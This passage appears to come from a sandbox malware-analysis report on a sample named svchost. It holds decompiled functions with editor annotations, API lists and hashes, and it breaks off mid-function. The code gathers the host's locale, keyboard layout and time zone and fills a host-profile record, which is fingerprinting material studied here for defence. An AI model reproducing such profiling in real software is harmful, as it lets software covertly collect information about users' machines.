    				unsigned int _t116;
    				long _t120;
    				void* _t121;
    				unsigned int _t127;
    				struct HICON__* _t128;
    				intOrPtr _t129;
    				struct HINSTANCE__* _t148;
    				intOrPtr _t151;
    				struct HWND__* _t155;
    				unsigned int _t160;
    				unsigned int _t162;
    				unsigned int _t164;
    				intOrPtr _t166;
    				signed int _t172;
    				int _t181;
    				intOrPtr* _t189;
    				intOrPtr _t205;
    				signed int _t206;
    				signed int _t207;
    				signed int _t208;
    				intOrPtr* _t209;
    				signed int _t210;
    				signed int _t211;
    				int _t212;
    				signed int _t213;
    				void* _t214;
    
    				_t213 = __ecx;
    				_v8 = __ecx;
    				 *((intOrPtr*)(__ecx + 0x1d4)) =  *((intOrPtr*)(__ecx + 0x1d4)) + 1;
    				if( *((intOrPtr*)(__ecx + 0x228)) == 0 || GetCurrentThreadId() ==  *((intOrPtr*)(_t213 + 0x228))) {
    					 *(_t213 + 0x42c) = 1;
    					E004173A0(_t213);
    					 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x104)) + 8))();
    					_t172 = 0;
    					_t102 =  *(_t213 + 0x420) >> 2;
    					_v12 = _t102;
    					_a4 = 0;
    					if(_t102 > 0) {
    						do {
    							_t205 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x418)) + _t172 * 4));
    							 *0x4bd320 = _t205;
    							if(_t205 != 0) {
    								asm("pushad");
    								 *0x4bd320();
    								asm("popad");
    								_t213 = _v8;
    								_t172 = _a4;
    								_t102 = _v12;
    							}
    							_t172 = _t172 + 1;
    							_a4 = _t172;
    						} while (_t172 < _t102);
    					}
    					E0040B7D0(_t213 + 0x410);
    					_t206 = 0;
    					_t160 =  *(_t213 + 0x130) >> 2;
    					if(_t160 > 0) {
    						do {
    							_t151 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x128)) + _t206 * 4));
    							if(_t151 != 0) {
    								 *((intOrPtr*)(_t151 + 0x78))(6,  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x13c)) + _t206 * 4)), 0);
    							}
    							_t206 = _t206 + 1;
    						} while (_t206 < _t160);
    					}
    					E0040B7D0(_t213 + 0x134);
    					E0040B7D0(_t213 + 0x120);
    					_t162 =  *(_t213 + 0x180) >> 2;
    					if(_t162 > 0) {
    						_t211 = 0;
    						if(_t162 > 0) {
    							do {
    								_t148 =  *( *((intOrPtr*)(_t213 + 0x178)) + _t211 * 4);
    								if(_t148 != 0) {
    									FreeLibrary(_t148);
    								}
    								_t211 = _t211 + 1;
    							} while (_t211 < _t162);
    						}
    						E0040B7D0(_t213 + 0x170);
    						E0040B7D0(_t213 + 0x184);
    						E0040B7D0(_t213 + 0x148);
    						E0040B7D0(_t213 + 0x15c);
    					}
    					_t164 =  *(_t213 + 0x1b0) >> 2;
    					if(_t164 > 0) {
    						_t210 = 0;
    						if(_t164 > 0) {
    							do {
    								FreeLibrary( *( *((intOrPtr*)(_t213 + 0x1a8)) + _t210 * 4));
    								_t210 = _t210 + 1;
    							} while (_t210 < _t164);
    						}
    						E0040B7D0(_t213 + 0x1a0);
    						E00482437(_t213 + 0x1b4, 0, 0xffffffff);
    					}
    					E00417A30(_t213, _t213);
    					E0048324D(_t213 + 0x1d0, _t213);
    					_t108 =  *(_t213 + 0x424);
    					 *((intOrPtr*)(_t213 + 0x19c)) = 0;
    					 *((intOrPtr*)(_t213 + 0x198)) = 0;
    					if(_t108 != 0) {
    						DestroyCursor(_t108);
    						 *(_t213 + 0x424) = 0;
    					}
    					_t109 =  *(_t213 + 0x428);
    					if(_t109 != 0) {
    						DestroyCursor(_t109);
    						 *(_t213 + 0x428) = 0;
    					}
    					_t110 =  *(_t213 + 0x3e4);
    					if(_t110 != 0 && IsWindow(_t110) != 0) {
    						_push(0);
    						if(E00484C12() != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x3c8)) + 0x58))();
    						}
    						 *(_t213 + 0x3e4) = 0;
    					}
    					E004161A0(_t213);
    					_t112 =  *((intOrPtr*)(_t213 + 0x3ac));
    					_t207 = 0;
    					_a4 = _t112;
    					if(_t112 > 0) {
    						do {
    							_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x3a8)) + _t207 * 4));
    							if(_t189 != 0) {
    								 *((intOrPtr*)( *_t189))(1);
    								_t112 = _a4;
    							}
    							_t207 = _t207 + 1;
    						} while (_t207 < _t112);
    					}
    					E004826D1(_t213 + 0x3a4, 0, 0xffffffff);
    					E0041A8C0(_t213, 1);
    					if( *(_t213 + 0x264) != 0) {
    						_t181 =  *((intOrPtr*)(_t213 + 0x25c));
    					} else {
    						_t181 = 0;
    					}
    					_t116 =  *(_t213 + 0x264) >> 2;
    					if(_t116 > 0) {
    						_a4 = _t181;
    						_v8 = _t116;
    						do {
    							_t209 =  *_t181;
    							if(_t209 != 0) {
    								_t128 =  *(_t209 + 0xc);
    								 *_t209 = 0;
    								 *((intOrPtr*)(_t209 + 4)) = 0;
    								 *((intOrPtr*)(_t209 + 8)) = 0;
    								 *((intOrPtr*)(_t209 + 0x14)) = 0;
    								if(_t128 != 0) {
    									DestroyCursor(_t128);
    									 *(_t209 + 0xc) = 0;
    								}
    								_t129 =  *((intOrPtr*)(_t209 + 0x10));
    								if( *((intOrPtr*)(_t209 + 0x10)) != 0) {
    									E0048302C(_t129);
    									_t214 = _t214 + 4;
    									 *((intOrPtr*)(_t209 + 0x10)) = 0;
    								}
    								E0048302C(_t209);
    								_t214 = _t214 + 4;
    							}
    							_t181 = _a4 + 4;
    							_t127 = _v8 - 1;
    							_a4 = _t181;
    							_v8 = _t127;
    						} while (_t127 != 0);
    					}
    					E0040B7D0(_t213 + 0x254);
    					if( *((intOrPtr*)(_t213 + 0x3a0)) == 1) {
    						 *0x492698();
    						 *((intOrPtr*)(_t213 + 0x3a0)) = 0;
    					}
    					_t166 =  *((intOrPtr*)(_t213 + 0xf8));
    					_t208 = 0;
    					if(_t166 > 0) {
    						do {
    							E004181F0(_t213,  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0xe0)) + _t208 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0xf4)) + _t208 * 4)), 0);
    							_t208 = _t208 + 1;
    						} while (_t208 < _t166);
    					}
    					E00482437(_t213 + 0xdc, 0, 0xffffffff);
    					E00482437(_t213 + 0xf0, 0, 0xffffffff);
    					_t120 =  *(_t213 + 0x404);
    					if(_t120 != 0) {
    						_t121 =  *0x4926e4(); // executed
    						 *(_t213 + 0x404) = 0;
    						return _t121;
    					}
    				} else {
    					_t155 =  *(_t213 + 0x3e4);
    					_t212 = _a4;
    					if(_t155 != 0 && IsWindow(_t155) != 0) {
    						SendMessageA( *(_t213 + 0x3e4), 0x83e7, _t212, 0);
    					}
    					_t120 =  *(_t213 + 0x42c);
    					if(_t120 == 0) {
    						ExitProcess(_t212);
    					}
    				}
    				return _t120;
    			}


    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CursorDestroy$FreeLibraryWindow$CleanupCurrentExitMessageProcessSendThread
    • String ID:
    • API String ID: 2560087610-0
    • Opcode ID: caa0337d093cc15d8a40d9360654fb79e38eb03f2c24204fc3923a337e9f66e6
    • Instruction ID: cd86c5fd5b554d2206fba4c362b2b5e48e2ae581dd0e7a02e3bdbaba295f60aa
    • Opcode Fuzzy Hash: caa0337d093cc15d8a40d9360654fb79e38eb03f2c24204fc3923a337e9f66e6
    • Instruction Fuzzy Hash: 2BB19C706007029BC724EF65C9D5BEBB3E4BF88304F50493EE5AA87281DF34A985CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E0046D210(void* __ecx) {
    				/* Annotation (editor, not decompiler output): host locale / time-zone
    				   fingerprint. __ecx points to an object whose +4 and +0x10 are ints and
    				   whose +8, +0xc, +0x14, +0x18, +0x1c, +0x20 are CString-style fields
    				   (E004833FF assigns from a C string, E004709B8 converts text to an int).
    				   The LCID is taken from the keyboard layout, not from the user locale. */
    				char _v260;
    				char _v276;
    				char _v520;
    				struct _TIME_ZONE_INFORMATION _v692;
    				char _v796;
    				char _v800;
    				char _v816;
    				char _v824;
    				char _v840;
    				char _v844;
    				int _t46;
    				long _t48;
    				void* _t73;
    				int _t75;
    
    				_t73 = __ecx;
    				_t75 = GetKeyboardLayout(0) & 0x0000ffff;                       // LANGID of the active keyboard layout, used as the LCID
    				GetLocaleInfoA(_t75, 0x1004,  &_v840, 7);                        // LOCALE_IDEFAULTANSICODEPAGE
    				 *((intOrPtr*)(_t73 + 4)) = E004709B8( &_v840,  &_v840);         // ANSI code page as int
    				GetLocaleInfoA(_t75, 0x1002,  &_v520, 0x104);                    // LOCALE_SENGCOUNTRY, e.g. "United States"
    				E004833FF(_t73 + 0xc,  &_v520);
    				GetLocaleInfoA(_t75, 5,  &_v844, 7);                             // LOCALE_ICOUNTRY (country/region code)
    				 *((intOrPtr*)(_t73 + 0x10)) = E004709B8( &_v844,  &_v844);      // country code as int
    				GetLocaleInfoA(_t75, 0x1003,  &_v796, 0x64);                     // LOCALE_STIMEFORMAT
    				E004833FF(_t73 + 0x14,  &_v796);
    				GetLocaleInfoA(_t75, 0x20,  &_v800, 0x64);                       // LOCALE_SLONGDATE
    				E004833FF(_t73 + 8,  &_v800);
    				GetLocaleInfoA(_t75, 0x14,  &_v844, 7);                          // LOCALE_SCURRENCY
    				E004833FF(_t73 + 0x18,  &_v844);
    				_t46 = VerLanguageNameA(GetSystemDefaultLangID() & 0x0000ffff,  &_v276, 0x104); // executed   // language name, e.g. "English (United States)"
    				if(_t46 <= 0x104) {                                             // return value larger than the buffer means it did not fit
    					E004833FF(_t73 + 0x1c,  &_v260);                            // most likely the same buffer as _v276; the offset shift is a decompiler artifact of the pushed call arguments
    				}
    				_t48 = GetTimeZoneInformation( &_v692); // executed
    				if(_t48 != 0xffffffff) {                                        // TIME_ZONE_ID_INVALID
    					wsprintfA( &_v824, "%S",  &(_v692.StandardName));           // wide StandardName narrowed to ANSI
    					return E004833FF(_t73 + 0x20,  &_v816);                     // _v816/_v824: same decompiler artifact as above
    				}
    				return _t48;
    			}

    Statement addresses (the side column of the listing, in statement order; 0x00000000 marks a statement without its own address): 0x0046d219 0x0046d231 0x0046d23e 0x0046d254 0x0046d263 0x0046d270 0x0046d27f 0x0046d28e 0x0046d29e 0x0046d2a8 0x0046d2b7 0x0046d2c1 0x0046d2d0 0x0046d2da 0x0046d2f8 0x0046d302 0x0046d30f 0x0046d30f 0x0046d31c 0x0046d325 0x0046d339 0x00000000 0x0046d34a 0x0046d358

    APIs
    • GetKeyboardLayout.USER32(00000000), ref: 0046D21D
    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007,?,?), ref: 0046D23E
    • GetLocaleInfoA.KERNEL32(00000000,00001002,?,00000104), ref: 0046D263
    • GetLocaleInfoA.KERNEL32(00000000,00000005,?,00000007,?), ref: 0046D27F
    • GetLocaleInfoA.KERNEL32(00000000,00001003,?,00000064), ref: 0046D29E
      • Part of subcall function 004833FF: lstrlen.KERNEL32(?,?,?,00481582,?), ref: 00483410
    • GetLocaleInfoA.KERNEL32(00000000,00000020,?,00000064,?), ref: 0046D2B7
    • GetLocaleInfoA.KERNEL32(00000000,00000014,?,00000007,?), ref: 0046D2D0
    • GetSystemDefaultLangID.KERNEL32(?), ref: 0046D2DF
    • VerLanguageNameA.VERSION(00000000,?,00000104), ref: 0046D2F8
    • GetTimeZoneInformation.KERNELBASE(?,00000000,?,00000104), ref: 0046D31C
    • wsprintfA.USER32 ref: 0046D339
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: InfoLocale$DefaultInformationKeyboardLangLanguageLayoutNameSystemTimeZonelstrlenwsprintf
    • String ID:
    • API String ID: 3783830871-0
    • Opcode ID: 43b210839b6e7734696f73e40a76b0b2129abbc6f133083619ec1c5d2a322214
    • Instruction ID: a6e053351c879639cc2d21686017044e5abc3a235cba03868aeb78416537ce34
    • Opcode Fuzzy Hash: 43b210839b6e7734696f73e40a76b0b2129abbc6f133083619ec1c5d2a322214
    • Instruction Fuzzy Hash: BE3189B15043017FD214EB60CC86EEFB368EF94715F40892EFA55461C0FBB8A609C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    Basic blocks of the rendered control-flow graph, as "id  address range  calls  -> successors" (the Executed / Not Executed colouring of the image is not recoverable from the text):
    • 469  483cee-483d19  call 473304, GetFullPathNameA  -> 472, 473
    • 472  483d1b-483d28  lstrcpyn  -> 474
    • 473  483d2d-483d5c  call 483dbe, GetVolumeInformationA  -> 477, 478
    • 474  483dae-483dbb  (function exit, no successors)
    • 477  483d5e-483d62  -> 479, 480
    • 478  483da0-483dac  call 4832c2  -> 474
    • 479  483d6b-483d6f  -> 482, 483
    • 480  483d64-483d65  CharUpperA  -> 479
    • 482  483d9d-483d9f  -> 478
    • 483  483d71-483d84  FindFirstFileA  -> 482, 485
    • 485  483d86-483d97  FindClose, lstrcpy  -> 482
    C-Code - Quality: 60%
    			E00483CEE() {
    				/* Annotation (editor): matches MFC's AfxFullPath(lpszPathOut, lpszFileIn),
    				   statically linked into the sample: fully qualify a path, then adjust its
    				   case and file-name part according to the volume's file-system flags.
    				   _t53 is the frame pointer set up by __EH_prolog (E00473304 installs the
    				   SEH handler E00490BE0); [ebp+8] = output buffer, [ebp+0xc] = input path. */
    				CHAR* _t29;
    				int _t34;
    				CHAR* _t36;
    				void* _t38;
    				CHAR* _t47;
    				void* _t53;
    
    				E00473304(E00490BE0, _t53);
    				_t47 =  *(_t53 + 8);                                                 // lpszPathOut
    				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {   // MAX_PATH; [ebp-0x14] receives lpszFilePart
    					_t29 =  *0x4b8924; // 0x4b8938                                  // empty-CString data block
    					 *(_t53 + 8) = _t29;                                          // CString strRoot, stored in the reused arg slot
    					_push(_t53 + 8);
    					 *(_t53 - 4) = 0;
    					E00483DBE(_t53, _t47);                                       // AfxGetRoot(lpszPathOut, strRoot)
    					_t34 = GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0); // executed   // [ebp-0x10] = file-system flags
    					if(_t34 != 0) {
    						if(( *(_t53 - 0x10) & 0x00000002) == 0) {               // !FS_CASE_IS_PRESERVED
    							CharUpperA(_t47);
    						}
    						if(( *(_t53 - 0x10) & 0x00000004) == 0) {               // !FS_UNICODE_STORED_ON_DISK
    							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);   // WIN32_FIND_DATAA at [ebp-0x158]
    							if(_t38 != 0xffffffff) {                             // INVALID_HANDLE_VALUE
    								FindClose(_t38);
    								 *0x4922a8( *(_t53 - 0x14), _t53 - 0x12c);       // lstrcpy(lpszFilePart, findData.cFileName); cFileName is at +0x2c
    							}
    						}
    						_push(1);                                                  // push 1 / pop eax: return TRUE (the decompiler's "_t36 = 0" below loses it)
    						_pop(0);
    					}
    					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
    					E004832C2(_t53 + 8);                                          // strRoot destructor (CString release)
    					_t36 = 0;
    				} else {
    					 *0x492214(_t47,  *(_t53 + 0xc), 0x104);                      // lstrcpyn(lpszPathOut, lpszFileIn, MAX_PATH): take the input literally
    					_t36 = 0;                                                      // return FALSE
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));                         // unlink the SEH frame
    				return _t36;
    			}

    Statement addresses (side column of the listing, in statement order): 0x00483cf3 0x00483d00 0x00483d19 0x00483d2d 0x00483d32 0x00483d3a 0x00483d3c 0x00483d3f 0x00483d54 0x00483d5c 0x00483d62 0x00483d65 0x00483d65 0x00483d6f 0x00483d7b 0x00483d84 0x00483d87 0x00483d97 0x00483d97 0x00483d84 0x00483d9d 0x00483d9f 0x00483d9f 0x00483da0 0x00483da7 0x00483dac 0x00483d1b 0x00483d20 0x00483d26 0x00483d26 0x00483db3 0x00483dbb

    APIs
    • __EH_prolog.LIBCMT ref: 00483CF3
    • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00483D11
    • lstrcpyn.KERNEL32(?,?,00000104), ref: 00483D20
    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00483D54
    • CharUpperA.USER32(?), ref: 00483D65
    • FindFirstFileA.KERNEL32(?,?), ref: 00483D7B
    • FindClose.KERNEL32(00000000), ref: 00483D87
    • lstrcpy.KERNEL32(?,?), ref: 00483D97
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
    • String ID:
    • API String ID: 304730633-0
    • Opcode ID: 9b4355d901b2660a762ec737d7bfddb323e8ac036359215d9167ae87e33fbe59
    • Instruction ID: 316965b4bb1bfe055935fff34fb401c1224924c8ea11d1db71ce3ff0721406ed
    • Opcode Fuzzy Hash: 9b4355d901b2660a762ec737d7bfddb323e8ac036359215d9167ae87e33fbe59
    • Instruction Fuzzy Hash: 8A218971500019BBCB21AF61DD08EEF7FBCEF45B65F00856AF919E20A0D7748A45CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    Basic blocks of the rendered control-flow graph, as "id  address range  calls  -> successors" (the Executed / Not Executed colouring of the image is not recoverable from the text):
    • 524  48d74c-48d7fd  GetVersion  -> 526, 527
    • 526  48d7ff-48d80e  GetProcessVersion  -> 527
    • 527  48d811-48d813  call 4891f9  -> 529
    • 529  48d818-48d858  call 4891b5, LoadCursorA * 2  (function exit)
    C-Code - Quality: 90%
    			E0048D74C() {
    				/* Annotation (editor): matches the constructor of MFC's global AUX_DATA
    				   afxData (here at 0x4e14d8): caches Windows version flags and the
    				   standard wait/arrow cursors. Runtime-library code, not sample-specific
    				   logic. */
    				unsigned int _t18;
    				intOrPtr _t19;
    				intOrPtr _t26;
    				long _t28;
    				void* _t40;
    				void* _t50;
    
    				_t50 = 0x4e14d8;                                                   // &afxData
    				_t18 = GetVersion();
    				 *0x004E152C = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);   // nWinVer; MFC computes (LOBYTE(v) << 8) + HIBYTE(v), the decompiler's rendering here is suspect
    				 *0x004E1530 = _t18 >> 0x1f;                                       // bWin95: high bit set on Win9x
    				asm("sbb eax, eax");                                               // bWin4 = LOBYTE(v) >= 4, computed branch-free
    				_t40 = 1;
    				_t19 = _t18 + 1;
    				 *0x004E1534 = _t19;                                               // bWin4
    				 *0x004E1538 = _t40 - _t19;                                        // bNotWin4 = 1 - bWin4
    				 *0x004E153C = _t19;                                               // bSmCaption = bWin4
    				 *0x004E1540 = 0;                                                  // bMarked4 = FALSE
    				if(_t19 != 0) {
    					_t28 = GetProcessVersion(0); // executed                        // bMarked4: is this process marked for >= 4.0
    					asm("sbb eax, eax");
    					 *((intOrPtr*)(0x4e1540)) = _t28 + 1;
    				}
    				E004891F9(_t50);                                                   // likely UpdateSysMetrics()
    				 *((intOrPtr*)(_t50 + 0x24)) = 0;
    				E004891B5(_t50);                                                   // likely the brush/pen/colour initialisation
    				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);             // hcurWait = IDC_WAIT
    				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);             // hcurArrow = IDC_ARROW
    				 *((intOrPtr*)(_t50 + 0x50)) = 0;
    				 *((intOrPtr*)(_t50 + 0x44)) = 0;                                   // hcurHelp, loaded on demand
    				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;       // bWin4 ? 2 : 1
    				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
    				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
    				return _t50;
    			}

    Statement addresses (side column of the listing, in statement order): 0x0048d7c1 0x0048d7c3 0x0048d7da 0x0048d7e4 0x0048d7e7 0x0048d7e9 0x0048d7ea 0x0048d7f1 0x0048d7f4 0x0048d7f7 0x0048d7fa 0x0048d7fd 0x0048d800 0x0048d80b 0x0048d80e 0x0048d80e 0x0048d813 0x0048d81a 0x0048d81d 0x0048d836 0x0048d83b 0x0048d843 0x0048d846 0x0048d84d 0x0048d84e 0x0048d851 0x0048d858

    APIs
    • GetVersion.KERNEL32(?,?,?,0048D747), ref: 0048D7C3
    • GetProcessVersion.KERNELBASE(00000000,?,?,?,0048D747), ref: 0048D800
    • LoadCursorA.USER32(00000000,00007F02), ref: 0048D82E
    • LoadCursorA.USER32(00000000,00007F00), ref: 0048D839
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CursorLoadVersion$Process
    • String ID:
    • API String ID: 2246821583-0
    • Opcode ID: 84310fbb9539963bc4cc0513087b4e93187ee9159378da839745ffb429fac627
    • Instruction ID: 2a3b0c9200005e757ef193c710f5ed6dde331bff4fdff35cd88e84cb51ee4ed3
    • Opcode Fuzzy Hash: 84310fbb9539963bc4cc0513087b4e93187ee9159378da839745ffb429fac627
    • Instruction Fuzzy Hash: F4118FB1A00B509FD724AF3A9C8552ABBE5FB487047004D3FE18BC6B90D7B8A4408B54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E004688C0(void* __eflags) {
    				/* Annotation (editor): fills a fixed-offset host-profile record in the
    				   caller-supplied buffer _t343 (stack argument at +0x68). Every
    				   "repne scasb ... memcpy(n >> 2) / memcpy(n & 3)" pair below is the
    				   compiler's inlined strlen + strcpy (rep movsd / rep movsb), so each
    				   field is a NUL-terminated ANSI string copied to a hard-coded offset.
    				   The E00468Cxx calls apparently return a CString by value into the
    				   temporary at +0x68, E004832C2 releases such a CString, and E004709B8
    				   converts a string to an int (as in E0046D210). */
    				void* __ebp;
    				intOrPtr _t78;
    				void* _t79;
    				intOrPtr* _t86;
    				intOrPtr _t95;
    				intOrPtr* _t97;
    				intOrPtr* _t109;
    				intOrPtr* _t116;
    				intOrPtr* _t123;
    				intOrPtr* _t130;
    				intOrPtr* _t137;
    				intOrPtr* _t144;
    				void* _t153;
    				signed int _t159;
    				signed int _t161;
    				signed int _t162;
    				unsigned int _t169;
    				signed int _t170;
    				unsigned int _t181;
    				signed int _t182;
    				unsigned int _t192;
    				signed int _t193;
    				unsigned int _t202;
    				signed int _t203;
    				unsigned int _t212;
    				signed int _t213;
    				unsigned int _t222;
    				signed int _t223;
    				unsigned int _t232;
    				signed int _t233;
    				unsigned int _t242;
    				signed int _t243;
    				void* _t332;
    				void* _t333;
    				void* _t334;
    				void* _t335;
    				void* _t336;
    				void* _t337;
    				void* _t338;
    				void* _t339;
    				void* _t340;
    				void* _t342;
    				void* _t343;
    				intOrPtr _t345;
    				void* _t346;
    				void* _t348;
    				void* _t350;
    				void* _t351;
    				void* _t353;
    				void* _t355;
    				void* _t357;
    				void* _t359;
    				void* _t361;
    				void* _t363;
    				void* _t365;
    
    				_push(0xffffffff);
    				_push(E00490770);                                                  // SEH handler guarding the CString temporaries
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t345;
    				_t346 = _t345 - 0x4c;
    				_push(_t342);
    				E00468CE0(_t346 + 0x18);
    				 *((intOrPtr*)(_t346 + 0x60)) = 0;
    				E0046D0E0(_t346 + 0x34);                                           // constructs an object at +0x34, destroyed by E0046D180 at the end
    				_t78 =  *0x4b8924; // 0x4b8938                                      // empty-CString data block
    				 *((intOrPtr*)(_t346 + 0xc)) = _t78;
    				 *((char*)(_t346 + 0x60)) = 2;
    				 *((intOrPtr*)(_t346 + 0x18)) = 0x400;
    				_t79 = E00468C20(_t346 + 0x10);
    				 *((char*)(_t346 + 0x64)) = 3;
    				E004833AF(_t346 + 0x10, _t342, _t79);
    				_t159 = _t346 + 0x10;
    				 *((char*)(_t346 + 0x60)) = 2;
    				E004832C2(_t159);
    				_t343 =  *(_t346 + 0x68);                                          // output record
    				asm("repne scasb");
    				_t161 =  !(_t159 | 0xffffffff);
    				_t332 =  *((intOrPtr*)(_t346 + 0xc)) - _t161;
    				_t162 = _t161 >> 2;
    				memcpy(_t343, _t332, _t162 << 2);                                  // record +0x00: string obtained via E00468C20
    				memcpy(_t332 + _t162 + _t162, _t332, _t161 & 0x00000003);
    				_t348 = _t346 + 0x18;
    				_t86 = E00468C40(_t346 + 0x68);
    				asm("repne scasb");
    				_t169 =  !(_t348 + 0x0000001c | 0xffffffff);
    				_t333 =  *_t86 - _t169;
    				_t170 = _t169 >> 2;
    				memcpy(_t333 + _t170 + _t170, _t333, memcpy(_t343 + 0x64, _t333, _t170 << 2) & 0x00000003);   // record +0x64
    				_t350 = _t348 + 0x18;
    				E004832C2(_t350 + 0x68);
